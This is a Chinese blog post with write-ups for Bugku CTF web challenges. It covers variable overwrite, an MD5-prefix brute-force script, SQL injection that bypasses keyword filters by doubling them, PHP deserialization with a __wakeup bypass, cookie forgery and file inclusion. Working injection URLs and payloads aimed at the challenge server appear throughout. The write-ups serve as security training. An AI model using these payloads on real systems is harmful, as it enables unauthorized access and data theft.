newbugku部分web题解

我的博客:https://yml-sec.top
有的图片上传失败了,可以去我的博客看原文。

web1

题目代码

5cc042e715786.png

看到extract函数,联想到常见的变量覆盖漏洞

根据我以前写的文章

点击链接

可以构造$b为任意值,后面判断了a和c是否相等,可以使用伪协议来做

18.jpg

web11

打开题目显示如下

19.jpg

标题为robots,尝试访问robots.txt,访问后提示我们shell.php

访问shell.php

[图片上传失败...(image-437e26-1556463025859)]

这块校验和西湖论剑的留言板题目很像,爆破脚本

import hashlib

def md5(key):
    m = hashlib.md5()
    m.update(key.encode('utf-8'))
    return m.hexdigest()

for i in range(1000000000):
    if md5(str(i))[0:6] == 'dc7dc4':
        print(i)
        break

结果如下

[图片上传失败...(image-107f9a-1556463025859)]

输入爆破出来的数字即可得到flag

22.jpg

web13

提交数据抓包,发现了base64加密的password

23.jpg

解密后是一个flag,但是提交发现并不正确,仔细观察数据包会发现一个hint

Hint: Seeing is not believing, maybe you need to be faster!

尝试将假flag中的字符串当做密码提交

[图片上传失败...(image-de8877-1556463025859)]

提示我们要快一些,这样写脚本就可以了

import requests
import base64
import re
url = "http://123.206.31.85:10013/index.php"
s = requests.session()
html = s.post(url,data={"password":"123456"})
#print(html.text)
password1 = html.headers['password']
password2 = base64.b64decode(password1)
re_str = re.compile('flag{(.*?)}',re.S)
password = re.findall(re_str,str(password2))
print(password[0])
html = s.post(url,data={"password":password[0]})
print(html.text)
25.jpg

web18

题目是一道sql注入,过滤了and or select union 这些可用双写绕过

判断列数

http://123.206.31.85:10018/list.php?id=2' oorrder by 3--+

[图片上传失败...(image-4d7008-1556463025859)]

在判断为4时页面无返回

所以我们得到列数为3

查询数据库名

http://123.206.31.85:10018/list.php?id=-2' uniounionn selecselectt 1,database(),3--+

[图片上传失败...(image-4f7fe1-1556463025859)]

查询表名

http://123.206.31.85:10018/list.php?id=-2' uniounionn selecselectt 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='web18'--+
29.jpg

查询列名

http://123.206.31.85:10018/list.php?id=-2' uniounionn selecselectt 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='flag'--+
30.jpg

获取flag

http://123.206.31.85:10018/list.php?id=-2' uniounionn selecselectt 1,flag,3 from flag--+

[图片上传失败...(image-8c4766-1556463025859)]

web20

题目如下

32.jpg

常规编写脚本即可,key=密文

import requests
import re
while(1):
    url = "http://123.206.31.85:10020/"
    s = requests.session()
    html = s.get(url)
    re1 = re.compile('¼�(.*?)<br/>',re.S)
    result = re.findall(re1,html.text)
    url2 = url+"?key="+result[0]
    html1 = s.get(url2)
    print(html1.text)

有一点要注意,这题目的flag是有几率出现的,需要多跑几次

[图片上传失败...(image-a7d5c6-1556463025859)]

web25

web3

定位到上传界面

[图片上传失败...(image-95ffae-1556463025859)]

观察链接联想到文件包含漏洞,可以使用伪协议读取

用扫描器扫描发现flag.php文件,开始利用伪协议读取

[图片上传失败...(image-a76a38-1556463025859)]

解密后得到flag

[图片上传失败...(image-91bc21-1556463025859)]

web4

题目是一个登录框,尝试使用万能密码登录

37.jpg

提交后竟然登录成功。。。。。

38.jpg

web15

提示vim编辑器,想到临时文件swp

输入swp提交

40.jpg

将1改为i成功解出题目

[图片上传失败...(image-dc4161-1556463025859)]

web22

web21

访问题目查看源码

[图片上传失败...(image-cf963-1556463025859)]

读取class.php的源码

[图片上传失败...(image-d284cb-1556463025859)]

<?php
error_reporting(E_ALL & ~E_NOTICE);
 
class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);    
        }
        return "__toString was called!";
    }
}
?>

提示我们有f1a9.php,这段代码可用反序列化利用

<?php
error_reporting(E_ALL & ~E_NOTICE);
 
class Read{//f1a9.php
    public $file = "f1a9.php";
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);    
        }
        return "__toString was called!";
    }
}
$a = new Read;
echo serialize($a);
?>

[图片上传失败...(image-2384ba-1556463025859)]

最后payload

[图片上传失败...(image-bf06d9-1556463025859)]

web23

题目主页面如下

[图片上传失败...(image-7742dc-1556463025859)]

使用扫面器扫出如下页面

[图片上传失败...(image-2857d9-1556463025859)]

readme.txt有如下提示

[图片上传失败...(image-bd324e-1556463025859)]

用户名是admin 密码是三位数字,我们可以用burp爆破

[图片上传失败...(image-d4b986-1556463025859)]

成功登陆后得到flag

[图片上传失败...(image-f29dbb-1556463025859)]

web7

注册登陆后,提示权限不够

50.jpg

尝试抓包

51.jpg

看到u和r的前几位是一样的,后面不一样的部分像是MD5加密后的字符串

在线解了一下

[图片上传失败...(image-f1c710-1556463025859)]

尝试把两个部分都换成admin的MD5加密字符串

[图片上传失败...(image-e8f8e2-1556463025859)]

得到FLAG

web12

题目如下

[图片上传失败...(image-68716c-1556463025859)]

查看源码

[图片上传失败...(image-eddcb8-1556463025859)]

class Time{
    public $flag = ******************;
    public $truepassword = ******************;
    public $time;
    public $password ;
    public function __construct($tt, $pp) {
    $this->time = $tt;
    $this->password = $pp;
    }
    function __destruct(){
        if(!empty($this->password))
        {
            if(strcmp($this->password,$this->truepassword)==0){
                echo "<h1>Welcome,you need to wait......<br>The flag will become soon....</h1><br>";
                if(!empty($this->time)){
                    if(!is_numeric($this->time)){
                        echo 'Sorry.<br>';
                        show_source(__FILE__);
                    }
                    else if($this->time < 11 * 22 * 33 * 44 * 55 * 66){
                        echo 'you need a bigger time.<br>';
                    }
                    else if($this->time > 66 * 55 * 44 * 33 * 23 * 11){
                        echo 'you need a smaller time.<br>';
                    }
                    else{
                        sleep((int)$this->time);
                        var_dump($this->flag);
                    }
                    echo '<hr>';
                }
                else{
                    echo '<h1>you have no time!!!!!</h1><br>';
                }
            }
            else{
                echo '<h1>Password is wrong............</h1><br>';
            }
        }
        else{
            echo "<h1>Please input password..........</h1><br>";
        }
    }
    function __wakeup(){
        $this->password = 1; echo 'hello hacker,I have changed your password and time, rua!';
    }
}
if(isset($_GET['rua'])){
    $rua = $_GET['rua'];
    @unserialize($rua);
}
else{
    echo "<h1>Please don't stop rua 233333</h1><br>";
}

常规的反序列化操作,计算符合条件的时间

56.jpg

exp

<?php
class Time{
    public $time;
    public $password;
    public function __construct($tt, $pp) {
    $this->time = $tt;
    $this->password = $pp;
    }
}

$password = array(0=>'yml');
$time = '0x4c06f351';
$yml = new Time($time,$password);

echo serialize($yml);

?>

payload

57.jpg

绕过wakeup

O:4:"Time":3:{s:4:"time";s:10:"0x4c06f351";s:8:"password";a:1:{i:0;s:3:"yml";}}

得到flag

[图片上传失败...(image-12bfae-1556463025859)]

web24

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,142评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,298评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,068评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,081评论 1 291
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,099评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,071评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,990评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,832评论 0 273
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,274评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,488评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,649评论 1 347
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,378评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,979评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,625评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,796评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,643评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,545评论 2 352